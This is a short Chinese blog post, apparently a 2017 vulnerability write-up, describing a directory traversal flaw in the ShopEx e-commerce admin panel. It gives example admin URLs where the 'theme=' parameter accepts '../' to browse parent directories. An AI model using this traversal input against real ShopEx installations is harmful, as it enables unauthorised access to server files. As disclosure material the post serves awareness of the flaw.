ShopEx后台历遍目录漏洞 |

发表评论
324 次浏览

A+

显示不全请点击全屏阅读

ShopEx后台历遍目录很蛋疼的
记得10年的是也有过的差不多的漏洞

主要是出在模板上
我们编辑目录之后得到URL

http://www.xxoo.com/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=
这里theme= 可以做../跳转
http://xxx.net/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../
跳到了上级目录

Tags：

ShopEx漏洞, 遍历目录漏洞,

如果您喜欢我的博客，欢迎点击图片定订阅到邮箱也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你，也可微信扫下方二维码打赏本人一杯咖啡

我的微信
这是我的微信扫一扫

我的微信公众号
我的微信公众号扫一扫

版权声明：本站收录文章，于2017年2月13日22:26:40，由 admin 发表，共 328 字。
转载请注明：ShopEx后台历遍目录漏洞 | | 安云网 – AnYun.ORG

发表评论取消回复

文章目录
繁

发表评论取消回复

登录 找回密码

登录找回密码